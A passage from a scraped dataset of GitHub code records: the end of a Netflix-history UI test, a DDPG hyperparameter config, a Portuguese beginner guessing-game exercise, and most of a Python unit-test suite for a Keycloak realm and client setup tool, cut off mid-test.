open(\"./sampledata/expected_search_result.csv\") as file:\n reader = pd.read_csv(file)\n data = list(reader)\n\n searched = []\n for i in NHS.list_of_films.children:\n searched.append(i.text)\n\n for l1, l2 in zip(data, searched):\n self.assertEqual(l1, l2)\n\n def testNetflixListFilter(self):\n NHS = NetflixHistoryScreen()\n NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n NHS.searchFiltered(\"Drama|Crime\")\n\n with open(\"./sampledata/expected_filter_result.csv\") as file:\n reader = pd.read_csv(file)\n data = list(reader)\n\n searched = []\n for i in NHS.list_of_films.children:\n searched.append(i.text)\n\n for l1, l2 in zip(data, searched):\n self.assertEqual(l1, l2)\n","repo_name":"stats-io/stats.io","sub_path":"tests/netflixtests/testHistoryScr.py","file_name":"testHistoryScr.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8008642194","text":"class AlgoConfig:\n def __init__(self):\n self.gamma = 0.99 # discount factor\n self.critic_lr = 1e-3 # learning rate for critic\n self.actor_lr = 1e-4 # learning rate for actor\n self.buffer_size = 8000 # size of replay buffer\n self.batch_size = 128 # mini-batch size\n self.tau = 0.001 # soft update\n self.critic_hidden_dim = 256 # hidden dimension of critic\n self.actor_hidden_dim = 256 # hidden dimension of actor","repo_name":"johnjim0816/rl-tutorials","sub_path":"joyrl/algos/DDPG/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"48"} +{"seq_id":"16900111769","text":"#03 - Utilizando estruturas de repetição com teste lógico, faça um programa que peça uma senha para iniciar seu processamento, só deixe o usuário continuar se a senha estiver correta, após entrar dê boas vindas a seu usuário e apresente a ele o jogo da advinhação, onde o computador vai “pensar” em um número inteiro entre 0 e 20. O jogador vai tentar adivinhar qual número foi escolhido até acertar, a cada palpite do usuário diga a ele se o número escolhido pelo computador é maior ou menor ao que ele palpitou, no final mostre quantos palpites foram necessários para vencer.\n\nfrom random import randint\n\n\n\nusuario = input(\"informe seu nome de usuário para cadastro:\")\nsenha = input(\"Informe uma senha para cadastro:\")\n\nwhile usuario == senha:\n print(\"Sua senha deve ser diferente do login: \")\n senha = input(\"Senha: \")\n\nprint(\"Cadastro aprovado\")\n\nlogin = input(\"informe o seu nome de usuário: \")\n\nwhile login != usuario:\n print(\"Login incorreto, tente novamente!\")\n login = input(\"Informe o seu nome de usuário: \")\n\nkey = input(\"Informe a sua senha: \")\n\n\nwhile key != senha:\n print(\"Senha incorreta, tente novamente: \")\n key = input(\"Informe a sua senha: \")\n\nprint(\"Bem vindo ao jogo da adivinhação! será que você consegue adivinhar o número que eu estou pensando ?!\")\ncomputador = randint(0, 20)\n\n\nprint(\"Vou pensar num número de 0 a 20, tente adivinhar !\")\n\nacertou = False\nacertou = 0\n\nwhile not acertou:\n jogador = int(input(\"E aí, qual o seu palpite ? ( de 0 a 10): \"))\n\n if jogador == computador:\n acertou = True\n print(f\"Você acertou !!! eu pensei exatamente no número {computador}\")\n else:\n if jogador < computador:\n print(\n f\"Hmm... não foi dessa vez, eu pensei num número maior que {jogador}\")\n elif jogador > computador:\n print(\n f\"Hmm... não foi dessa vez, eu pensei num número menor que {jogador}\")","repo_name":"rosifurst/Blue-Edtech_M-dulo01","sub_path":"Exercícios/ex003.py","file_name":"ex003.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39170952638","text":"import json\n\nimport base64\nimport fixtures\nfrom kubernetes.client import rest\nimport mock\nimport requests\nimport responses\nimport testtools\n\nfrom keycloak_setup import keycloak_setup\n\n\nclass TestKeycloakSetup(testtools.TestCase):\n def test_run(self):\n skc_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_setup_keycloak')).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n\n kcs.run()\n\n skc_mock.assert_called_once_with()\n\n def test_run_post_clients(self):\n ccs_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_clients')).mock\n css_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_secrets')).mock\n cfs_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_check_features')).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs.run_post_clients()\n\n ccs_mock.assert_called_once_with()\n css_mock.assert_called_once_with()\n cfs_mock.assert_called_once_with()\n\n def test_kc_master_admin_client(self):\n kcs = keycloak_setup.KeycloakSetup()\n\n lac_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.oauthlib.oauth2, 'LegacyApplicationClient')).mock\n osess_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.requests_oauthlib, 'OAuth2Session')).mock\n\n client = kcs.kc_master_admin_client\n\n self.assertIs(client, osess_mock.return_value)\n\n lac_mock.assert_called_once_with(client_id='admin-cli')\n\n kc_master_token_endpoint = (\n 'http://keycloak.services:8080/keycloak/realms/'\n 'master/protocol/openid-connect/token')\n osess_mock.assert_called_once_with(\n client=lac_mock.return_value,\n auto_refresh_url=kc_master_token_endpoint,\n auto_refresh_kwargs={\n 'client_id': 'admin-cli',\n },\n token_updater=mock.ANY)\n\n oauth2session = osess_mock.return_value\n\n oauth2session.fetch_token.assert_called_once_with(\n token_url=kc_master_token_endpoint,\n client_id='admin-cli',\n username='admin',\n password='adminpwd')\n\n self.assertIs(kcs._kc_master_admin_client_cache, client)\n\n def test_setup_keycloak(self):\n wkr_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_wait_keycloak_ready'\n )).mock\n\n csr_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'create_realm'\n )).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n\n kcs._setup_keycloak()\n\n wkr_mock.assert_called_once_with()\n csr_mock.assert_called_once_with(kcs.SHASTA_REALM_NAME)\n\n def test_wait_keycloak_ready_up_2_30(self):\n gu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_get_uptime_ms'\n )).mock\n gu_mock.return_value = 150001\n rt_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'reset_keycloak_master_admin_session'\n )).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._wait_keycloak_ready()\n\n gu_mock.assert_called_with()\n self.assertEqual(6, gu_mock.call_count)\n rt_mock.assert_called_once_with()\n\n def test_wait_keycloak_ready_up_short(self):\n gu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_get_uptime_ms'\n )).mock\n # First time through loop one of the responses is <2:30, next time\n # all are >2:30\n gu_mock.side_effect = [\n 1000, 150001, 150001, 150001, 150001, 150001,\n 150001, 150001, 150001, 150001, 150001, 150001,\n ]\n sleep_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.time, 'sleep'\n )).mock\n rt_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'reset_keycloak_master_admin_session'\n )).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._wait_keycloak_ready()\n\n gu_mock.assert_called_with()\n self.assertEqual(12, gu_mock.call_count)\n sleep_mock.assert_called_once_with((150000 - 1000) / 1000.0)\n rt_mock.assert_called_with()\n self.assertEqual(2, rt_mock.call_count)\n\n @responses.activate\n def test_get_uptime_ms(self):\n si_url = 'http://keycloak.services:8080/keycloak/admin/serverinfo'\n si_example_response = {\n 'systemInfo': {\n 'version': '9.0.0',\n 'serverTime': 'Fri May 15 19:12:50 GMT 2020',\n 'uptime': '1 day, 1 hour, 45 minutes, 48 seconds',\n 'uptimeMillis': 92748706,\n },\n # Other stuff we don't care about.\n }\n responses.add(responses.GET, si_url, json=si_example_response)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n result = kcs._get_uptime_ms()\n self.assertEqual(92748706, result)\n\n @responses.activate\n def test_create_realm(self):\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_realms_url = 'http://keycloak.services:8080/keycloak/admin/realms'\n responses.add(responses.POST, kc_realms_url, status=201, json={})\n\n kcs.create_realm(kcs.SHASTA_REALM_NAME)\n\n self.assertEqual(1, len(responses.calls))\n self.assertEqual(kc_realms_url, responses.calls[0].request.url)\n\n exp_req_body = {\n 'realm': 'shasta',\n 'enabled': True,\n 'ssoSessionIdleTimeout': 31536000,\n 'ssoSessionMaxLifespan': 31536000,\n 'accessTokenLifespan': 31536000,\n 'accessTokenLifespanForImplicitFlow': 31536000,\n 'roles': {'realm': [{'name': 'tenant-admin'}]},\n }\n self.assertEqual(\n exp_req_body, json.loads(responses.calls[0].request.body))\n\n @responses.activate\n def test_create_realm_fail(self):\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_realms_url = 'http://keycloak.services:8080/keycloak/admin/realms'\n responses.add(responses.POST, kc_realms_url, status=401, json={})\n\n self.assertRaises(Exception, kcs.create_realm, kcs.SHASTA_REALM_NAME)\n\n @responses.activate\n def test_calc_client_url_found(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n fake_id = str(mock.sentinel.id)\n responses.add(responses.GET, clients_url, json=[{'id': fake_id}])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n res = kcs.calc_client_url(fake_client_id)\n exp_client_url = f'{clients_url}/{fake_id}'\n self.assertEqual(exp_client_url, res)\n\n exp_query_url = f'{clients_url}?clientId={fake_client_id}'\n self.assertEqual(exp_query_url, responses.calls[0].request.url)\n\n @responses.activate\n def test_calc_client_url_not_found(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n responses.add(responses.GET, clients_url, json=[])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n res = kcs.calc_client_url(fake_client_id)\n self.assertIsNone(res)\n\n @responses.activate\n def test_calc_client_url_error(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n responses.add(responses.GET, clients_url, status=500, json=[])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n self.assertRaises(\n requests.exceptions.HTTPError, kcs.calc_client_url, fake_client_id)\n\n def test_cleanup_clients(self):\n cc_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_client')).mock\n clients_to_cleanup = [str(mock.sentinel.client1)]\n kcs = keycloak_setup.KeycloakSetup(clients_to_cleanup=clients_to_cleanup)\n kcs._cleanup_clients()\n cc_mock.assert_called_once_with(str(mock.sentinel.client1))\n\n @responses.activate\n def test_cleanup_client_exists(self):\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n fake_url = 'http://keycloak.services:8080/whatever'\n ccu_mock.return_value = fake_url\n\n responses.add(responses.DELETE, fake_url, status=204)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n\n ccu_mock.assert_called_once_with(fake_client_id)\n self.assertEqual(1, len(responses.calls))\n\n def test_cleanup_client_not_found(self):\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n ccu_mock.return_value = None\n kcs = keycloak_setup.KeycloakSetup()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n ccu_mock.assert_called_once_with(fake_client_id)\n\n @responses.activate\n def test_cleanup_client_error(self):\n # When _cleanup_client is called and the delete operation fails\n # the error is ignored.\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n fake_url = 'http://keycloak.services:8080/whatever'\n ccu_mock.return_value = fake_url\n\n responses.add(responses.DELETE, fake_url, status=500)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n\n ccu_mock.assert_called_once_with(fake_client_id)\n self.assertEqual(1, len(responses.calls))\n\n def test_cleanup_secrets(self):\n cs_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_secret')).mock\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_secret_namespaces = [str(mock.sentinel.namespace1_1)]\n secrets_to_cleanup = [\n {\n 'name': fake_secret_name,\n 'namespaces': fake_secret_namespaces,\n },\n ]\n kcs = keycloak_setup.KeycloakSetup(secrets_to_cleanup=secrets_to_cleanup)\n kcs._cleanup_secrets()\n cs_mock.assert_called_once_with(fake_secret_name, fake_secret_namespaces)\n\n def test_cleanup_secret(self):\n ds_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_delete_secret')).mock\n kcs = keycloak_setup.KeycloakSetup()\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_secret_namespace = str(mock.sentinel.namespace1_1)\n fake_secret_namespaces = [fake_secret_namespace]\n kcs._cleanup_secret(fake_secret_name, fake_secret_namespaces)\n ds_mock.assert_called_once_with(fake_secret_name, fake_secret_namespace)\n\n def test_delete_secret_deleted(self):\n kcs = keycloak_setup.KeycloakSetup()\n k8s_corev1_mock = mock.Mock()\n kcs._k8s_corev1_cache = k8s_corev1_mock\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_namespace = str(mock.sentinel.namespace1_1)\n kcs._delete_secret(fake_secret_name, fake_namespace)\n k8s_corev1_mock.delete_namespaced_secret.assert_called_once_with(\n fake_secret_name, fake_namespace)\n\n def test_delete_secret_doesnt_exist(self):\n # If the secret already doesn't exist, that's ignored.\n kcs = keycloak_setup.KeycloakSetup()\n k8s_corev1_mock = mock.Mock()\n k8s_corev1_mock.delete_namespaced_secret.side_effect = rest.ApiException(404)\n kcs._k8s_corev1_cache = k8s_corev1_mock\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_namespace = str(mock.sentinel.namespace1_1)\n kcs._delete_secret(fake_secret_name, fake_namespace)\n\n def test_delete_secret_fails(self):\n # If there's another error deleting the secret it's re-raised.\n kcs = keycloak_setup.KeycloakSetup()\n k8s_corev1_mock = mock.Mock()\n k8s_corev1_mock.delete_namespaced_secret.side_effect = rest.ApiException(403)\n kcs._k8s_corev1_cache = k8s_corev1_mock\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_namespace = str(mock.sentinel.namespace1_1)\n self.assertRaises(\n rest.ApiException, kcs._delete_secret, fake_secret_name, fake_namespace)\n\n def test_client_input_validation(self):\n\n \"\"\"Test input validation for the KeycloakClient class\"\"\"\n\n kcs = keycloak_setup.KeycloakSetup()\n\n # -----------------------------------------------------------\n # Type checking\n # -----------------------------------------------------------\n\n # bad keycloak setup type\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n None,\n kcs.SHASTA_REALM_NAME,\n 'test')\n # bad realm type\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n None,\n 'test')\n # bad client type\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n None)\n # bad k8s secret name type\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 0)\n # bad k8s secret namespace type\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'test-secret-name',\n 0)\n\n # bad k8s secret namespace element\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'test-secret-name',\n [0])\n\n # bad k8s secret namespace element\n self.assertRaises(TypeError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'test-secret-name',\n [0])\n\n # -----------------------------------------------------------\n # Value checking\n # -----------------------------------------------------------\n\n # bad realm\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n '\\t',\n 'test')\n\n # bad user\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n 'test',\n '\\t')\n\n # bad k8s secret name\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'bad_secret_name',\n ['test'])\n # bad k8s secret namespace\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'test',\n ['bad_namespace'])\n # k8s secret name set to None, namespaces not\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n None,\n ['test'])\n # k8s secret namespaces set to None, name not\n self.assertRaises(ValueError,\n keycloak_setup.KeycloakClient,\n kcs,\n kcs.SHASTA_REALM_NAME,\n 'test',\n 'test',\n None)\n\n # test attempt to create secret with no name set (should be no op)\n\n c = keycloak_setup.KeycloakClient(kcs, 'test', 'test')\n c.create_k8s_secrets()\n\n # test attempt to create secret without first creating client\n c = keycloak_setup.KeycloakClient(kcs, 'test', 'test', 'secret-name', ['test'])\n self.assertRaises(ValueError, c.create_k8s_secrets)\n\n # validate defaults\n c = keycloak_setup.KeycloakClient(kcs, 'test', 'test', 'secret-name', ['test'])\n self.assertFalse(c.standard_flow_enabled)\n self.assertFalse(c.implicit_flow_enabled)\n self.assertFalse(c.direct_access_grants_enabled)\n self.assertFalse(c.service_accounts_enabled)\n self.assertFalse(c.public_client)\n\n # validate unable to set properties to bad type\n # then good bool value\n for p in ('public_client',\n 'service_accounts_enabled',\n 'direct_access_grants_enabled',\n 'implicit_flow_enabled',\n 'standard_flow_enabled'):\n\n self.assertRaises(TypeError,\n setattr,\n c,\n p,\n None)\n\n setattr(c, p, True)\n\n self.assertTrue(c.standard_flow_enabled)\n self.assertTrue(c.implicit_flow_enabled)\n self.assertTrue(c.direct_access_grants_enabled)\n self.assertTrue(c.service_accounts_enabled)\n self.assertTrue(c.public_client)\n\n # test role assignment type and value errors\n self.assertRaises(TypeError,\n c.create_role,\n None)\n\n self.assertRaises(ValueError,\n c.create_role,\n '\\t')\n\n # client URL is not set before create\n self.assertRaises(ValueError,\n c.create_role,\n 'test')\n\n # create collision for core attributes (keycloak)\n c.set_req_attr('implicitFlowEnabled', False)\n self.assertRaises(ValueError, c.create)\n\n # create collision for core K8S secret attributes\n c.set_k8s_secret_attr('client-id', 'foo')\n self.assertRaises(ValueError, c.create_k8s_secrets)\n\n # validate type checking when setting client_roles\n self.assertRaises(TypeError, setattr, c, 'client_roles', None)\n self.assertRaises(TypeError, setattr, c, 'client_roles', [None])\n c.client_roles = ['role1']\n self.assertEquals(['role1'], c.client_roles)\n\n # validate type checking when setting authorization_services_enabled\n self.assertRaises(TypeError, setattr, c, 'authorization_services_enabled', None)\n c.authorization_services_enabled = True\n self.assertTrue(c.authorization_services_enabled)\n\n @responses.activate\n def test_create_client(self):\n\n \"\"\"Test non-public client creation\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': str(mock.sentinel.location)})\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n # mock k8s_apply_secret, tested elsewhere\n\n k8s_secret_create_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup, 'k8s_apply_secret'\n )).mock\n\n # create client and request properties\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client',\n 'test-k8s-secret-name',\n ['test-k8s-secret-namespace']\n )\n\n client.direct_access_grants_enabled = True\n client.service_accounts_enabled = True\n\n # use dummy values for client.id for audience mapping\n client_pm = \\\n [\n {\n 'name': 'admin-role',\n 'protocol': 'openid-connect',\n 'protocolMapper': 'oidc-hardcoded-role-mapper',\n 'consentRequired': False,\n 'config': {\n 'role': 'shasta.admin',\n },\n },\n {\n 'name': '{}-aud-mapper'.format(client.id),\n 'protocolMapper': 'oidc-audience-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'included.client.audience': client.id,\n 'id.token.claim': False,\n 'access.token.claim': True,\n },\n },\n ]\n\n client.set_req_attr('protocolMappers', client_pm)\n\n # call to get keycloak ID\n kc_clients_uuid_url = f'{kc_clients_url}?clientId={client.id}'\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}])\n\n # call to get keycloak client secret, usign 12345 as keycloak id\n kc_clients_secret_url = f'{kc_base}/admin/realms/shasta/clients/12345/client-secret'\n responses.add(\n responses.GET, kc_clients_secret_url, status=200, json={'value': \"secret\"})\n\n # Get the service account user for the client\n kc_clients_user_url = f'{kc_base}/admin/realms/shasta/users?username=service-account-test_client'\n responses.add(\n responses.GET, kc_clients_user_url, status=200, json=[{'id': \"dummy-client-uuid\", 'username': \"service-account-test_client\"}])\n\n # Get the client ID\n kc_clients_realm_mgmt_url = f'{kc_base}/admin/realms/shasta/clients?clientId=realm-management'\n responses.add(\n responses.GET, kc_clients_realm_mgmt_url, status=200, json=[{'id': \"dummy-client-realm-mgmt-uuid\"}])\n\n # Get the client role ID\n kc_realm_mgmt_roles_url = f'{kc_base}/admin/realms/shasta/clients/dummy-client-realm-mgmt-uuid/roles/view-clients'\n responses.add(\n responses.GET, kc_realm_mgmt_roles_url, status=200, json={'id': 'id', 'name': 'view-clients', 'clientRole': True})\n\n # Post the client role list to the users endpoint\n kc_user_role_map_url = f'{kc_base}/admin/realms/shasta/users/dummy-client-uuid/role-mappings/clients/dummy-client-realm-mgmt-uuid'\n responses.add(\n responses.POST, kc_user_role_map_url, status=204, json={})\n\n # Request adding a service account role\n client._service_account_client_roles = {\"realm-management\": [\"view-clients\"]}\n\n # Test create and create_k8s_secrets\n client.create()\n client.create_k8s_secrets()\n\n k8s_secret_create_mock.assert_called_with(client.k8s_secret_namespaces[0],\n client.k8s_secret_name,\n {'client-id': client.id, 'client-secret': 'secret'})\n\n # verify calls, there should be:\n # - one to create client\n # - one to get the keycloak ID for client\n # - one to get the keycloak secret for the client\n # Additional calls are for the purpose of adding a client role as noted above.\n\n self.assertEqual(7, len(responses.calls))\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n\n exp_req_body = {\n 'authorizationServicesEnabled': False,\n 'clientId': client.id,\n 'standardFlowEnabled': False,\n 'implicitFlowEnabled': False,\n 'directAccessGrantsEnabled': True,\n 'serviceAccountsEnabled': True,\n 'publicClient': False,\n 'protocolMappers': client_pm\n }\n self.assertEqual(\n exp_req_body, json.loads(responses.calls[0].request.body))\n\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n self.assertEqual(kc_clients_user_url, responses.calls[2].request.url)\n self.assertEqual(kc_clients_realm_mgmt_url, responses.calls[3].request.url)\n self.assertEqual(kc_realm_mgmt_roles_url, responses.calls[4].request.url)\n self.assertEqual(kc_user_role_map_url, responses.calls[5].request.url)\n self.assertEqual(kc_clients_secret_url, responses.calls[6].request.url)\n\n @responses.activate\n def test_create_client_fail(self):\n\n \"\"\"Test non-public client creation failure\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call, forced to 401 status\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n responses.add(\n responses.POST, kc_clients_url, status=401, json={},\n headers={'location': str(mock.sentinel.location)})\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n client.direct_access_grants_enabled = True\n client.service_accounts_enabled = True\n\n # Test create and create_k8s_secrets\n self.assertRaises(Exception, client.create)\n\n @responses.activate\n def test_create_client_service_acct_role_fail(self):\n\n \"\"\"Test non-public client creation\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': str(mock.sentinel.location)})\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n # create client and request properties\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client',\n 'test-k8s-secret-name',\n ['test-k8s-secret-namespace']\n )\n # Mock call to get keycloak ID\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}])\n\n # Mock the case where a service account user for the client was not found.\n # This will return a 200 response and an empty list.\n kc_clients_user_url = f'{kc_base}/admin/realms/shasta/users?username=service-account-test_client'\n responses.add(\n responses.GET, kc_clients_user_url, status=200, json=[])\n\n # Request adding a service account role\n client._service_account_client_roles = {\"realm-management\": [\"view-clients\"]}\n client.create()\n\n # Verify the expected number of API calls.\n self.assertEqual(3, len(responses.calls))\n\n # Test the handling when the client is not found.\n # Update the previous mock so that it will return the expected result.\n responses.replace(\n responses.GET, kc_clients_user_url, status=200,\n json=[{'id': \"test_client-uuid\", 'username': \"service-account-test_client\"}])\n\n # Mock the case where the client ID can not be found from the client name.\n kc_clients_realm_mgmt_url = f'{kc_base}/admin/realms/shasta/clients?clientId=realm-management'\n responses.add(\n responses.GET, kc_clients_realm_mgmt_url, status=200,\n json=[])\n\n client.create()\n self.assertEqual(3 + 4, len(responses.calls)) # Expecting 4 new calls for this test\n\n @responses.activate\n def test_create_public_client(self):\n\n \"\"\"Test public client create with role assignment\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n client.public_client = True\n client.direct_access_grants_enabled = True\n\n # use dummy values for client.id for audience mapping\n client_pm = \\\n [\n {\n 'name': 'uid-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'uidNumber',\n 'claim.name': 'uidNumber',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'gid-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'gidNumber',\n 'claim.name': 'gidNumber',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'loginshell-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'loginShell',\n 'claim.name': 'loginShell',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'homedirectory-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'homeDirectory',\n 'claim.name': 'homeDirectory',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': '{}-aud-mapper'.format(client.id),\n 'protocolMapper': 'oidc-audience-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'included.client.audience': client.id,\n 'id.token.claim': True,\n 'access.token.claim': True,\n },\n },\n {\n 'name': '{}-aud-mapper'.format(client.id),\n 'protocolMapper': 'oidc-audience-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'included.client.audience': client.id,\n 'id.token.claim': False,\n 'access.token.claim': True,\n },\n },\n ]\n\n client.set_req_attr('protocolMappers', client_pm)\n\n # call for initial client create\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to set roles\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n responses.add(responses.POST, kc_roles_url, status=201, json={})\n\n # Test create\n client.create()\n\n # verify first call to create client\n exp_req_body = {\n 'authorizationServicesEnabled': False,\n 'clientId': client.id,\n 'standardFlowEnabled': False,\n 'implicitFlowEnabled': False,\n 'directAccessGrantsEnabled': True,\n 'serviceAccountsEnabled': False,\n 'publicClient': True,\n 'protocolMappers': client_pm\n }\n self.assertEqual(\n exp_req_body, 